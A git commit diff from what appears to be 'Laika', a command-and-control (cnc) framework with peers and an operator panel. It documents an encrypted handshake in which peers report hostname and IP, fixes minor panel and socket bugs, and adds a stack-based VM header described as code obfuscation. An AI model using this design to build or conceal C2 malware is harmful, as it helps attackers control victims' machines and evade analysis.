minor refactoring, better docs in lpacket.h

- fixed minor bug in panel_getChar()

.vscode/settings.json

@@ -36,6 +36,7 @@
         "EWOULD",
         "ISPROTECTED",
         "Laika",
+        "LAIKAENC",
         "LAIKAMAGIC",
         "LAIKAMAGICLEN",
         "LAIKAPKT",

lib/include/lpacket.h

@@ -9,30 +9,34 @@
 #define LAIKA_HOSTNAME_LEN 64
 #define LAIKA_IPV4_LEN 16
 
-/* NONCE: randomly generated uint8_t[LAIKA_NONCESIZE] */
-
 /* first handshake between peer & cnc works as so:
-    - peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey
+    - peer connects to cnc and sends a LAIKAPKT_HANDSHAKE_REQ with the peer's pubkey, hostname & inet ip
     - after cnc receives LAIKAPKT_HANDSHAKE_REQ, all packets are encrypted
     - cnc responds with LAIKAPKT_HANDSHAKE_RES
     - if peer is an authenticated client (panel), LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ is then sent
 */
 
+/* encrypted packets are laid out like so: (any packet sent/received where peer->useSecure is true)
+    LAIKAPKT_ID pktID; -- plain text
+    uint8_t nonce[crypto_secretbox_NONCEBYTES]; -- plain text
+    uint8_t body[pktSize + crypto_secretbox_MACBYTES]; -- encrypted with shared key & nonce
+*/
+
 enum {
-    LAIKAPKT_HANDSHAKE_REQ,
+    LAIKAPKT_HANDSHAKE_REQ, /* first packet sent by peer & received by cnc */
     /* layout of LAIKAPKT_HANDSHAKE_REQ:
-    *   uint8_t laikaMagic[LAIKA_MAGICLEN];
+    *   uint8_t laikaMagic[LAIKA_MAGICLEN]; -- LAIKA_MAGIC
     *   uint8_t majorVer;
     *   uint8_t minorVer;
     *   uint8_t pubKey[crypto_kx_PUBLICKEYBYTES]; -- freshly generated pubKey to encrypt decrypted nonce with
-    *   char hostname[LAIKA_HOSTNAME_LEN];
-    *   char ipv4[LAIKA_IPV4_LEN];
+    *   char hostname[LAIKA_HOSTNAME_LEN]; -- can be empty (ie. all NULL bytes)
+    *   char ipv4[LAIKA_IPV4_LEN]; -- can be empty (ie. all NULL bytes)
     */
     LAIKAPKT_HANDSHAKE_RES,
     /* layout of LAIKAPKT_HANDSHAKE_RES:
-    *   uint8_t endian;
+    *   uint8_t cncEndian;
     */
-    LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ,
+    LAIKAPKT_AUTHENTICATED_HANDSHAKE_REQ, /* second packet sent by authenticated peers (panel). there is no response packet */
     /* layout of LAIKAPKT_STAGE2_HANDSHAKE_REQ
     *   uint8_t peerType;
     */
@@ -50,8 +54,8 @@ enum {
     */
     LAIKAPKT_VARPKT_REQ,
     /* layout of LAIKAPKT_VARPKT_REQ:
-    *   uint8_t pktID;
-    *   uint16_t pktSize;
+    *   LAIKAPKT_ID pktID;
+    *   LAIKAPKT_SIZE pktSize;
     */
     LAIKAPKT_MAXNONE
 };

lib/src/lsocket.c

@@ -305,7 +305,7 @@ RAWSOCKCODE laikaS_rawRecv(struct sLaika_socket *sock, size_t sz, int *processed
 
 RAWSOCKCODE laikaS_rawSend(struct sLaika_socket *sock, size_t sz, int *processed) {
     RAWSOCKCODE errCode = RAWSOCK_OK;
-    int sent, sentBytes = 0;
+    int sent, i, sentBytes = 0;
 
     /* write bytes to the socket until an error occurs or we finish sending */
     do {
@@ -338,7 +338,6 @@ RAWSOCKCODE laikaS_rawSend(struct sLaika_socket *sock, size_t sz, int *processed
 _rawWriteExit:
 #ifdef DEBUG
     /* for debugging */
-    int i;
     printf("---sent %d bytes---\n", sent);
     for (i = 1; i <= sentBytes; i++) {
         printf("%.2x ", sock->outBuf[i-1]);

lvm.h

@@ -0,0 +1,50 @@
+#ifndef LAIKA_VM_H
+#define LAIKA_VM_H
+
+/* Laika VM:
+        This is an obfuscation technique where vital code can be executed in a
+    stack-based VM, inlined into the function. The VM instruction-set is fairly
+    simple, see the OP_* for avaliable opcodes and their expected arguments.
+*/
+
+#define LAIKA_VM_CODESIZE 512
+#define LAIKA_VM_STACKSIZE 64
+#define LAIKA_VM_CONSTSIZE 32
+
+struct sLaika_vm_val {
+    union {
+        int i;
+        void *ptr;
+    };
+};
+
+struct sLaika_vm {
+    struct sLaika_vm_val stack[LAIKA_VM_STACKSIZE];
+    struct sLaika_vm_val constList[LAIKA_VM_CONSTSIZE];
+    uint8_t code[LAIKA_VM_CODESIZE];
+    int pc;
+};
+
+#define LAIKA_MAKE_VM_INT(i) (struct sLaika_vm_val)({.i = i})
+#define LAIKA_MAKE_VM_PTR(ptr) (struct sLaika_vm_val)({.ptr = ptr})
+#define LAIKA_MAKE_VM(consts, code) (struct sLaika_vm)({.constList = consts, .code = code, .pc = 0})
+
+enum {
+    OP_EXIT,
+    OP_LOADCONST, /* stk_indx[uint8_t] = const_indx[uint8_t] */
+    OP_LOAD,
+
+    /* arithmetic */
+    OP_ADD, /* stk_indx[uint8_t] = stk_indx[uint8_t] + stk_indx[uint8_t] */
+    OP_SUB, /* stk_indx[uint8_t] = stk_indx[uint8_t] - stk_indx[uint8_t] */
+    OP_MUL, /* stk_indx[uint8_t] = stk_indx[uint8_t] * stk_indx[uint8_t] */
+    OP_DIV, /* stk_indx[uint8_t] = stk_indx[uint8_t] / stk_indx[uint8_t] */
+    OP_AND, /* stk_indx[uint8_t] = stk_indx[uint8_t] & stk_indx[uint8_t] */
+    OP_OR,  /* stk_indx[uint8_t] = stk_indx[uint8_t] | stk_indx[uint8_t] */
+    OP_XOR, /* stk_indx[uint8_t] = stk_indx[uint8_t] ^ stk_indx[uint8_t] */
+
+    /* control-flow */
+    OP_TESTJMP, /* if stk_indx[uint8_t] != 0, pc = [uint8_t] */
+};
+
+#endif

panel/src/panel.c

@@ -92,7 +92,7 @@ tPanel_list *panel_getActiveList() {
 
 int panel_getChar() {
     /* if we have an activeList panel, grab the input from that otherwise return -1 */
-    if (activeList)
+    if (panel_getActiveList() != NULL)
         return wgetch(panel_getActiveList()->win);
     return -1;
 }
@@ -473,7 +473,7 @@ bool panelL_tick(tPanel_list *list, int ch) {
         case LIST_LIST: return panelL_tickList(list, ch);
         case LIST_TABS: return panelL_tickTabs((tPanel_tabs*)list, ch);
         case LIST_MENU: return panelL_tickMenu((tPanel_menu*)list, ch);
-        return false;
+        default: return false;
     }
 }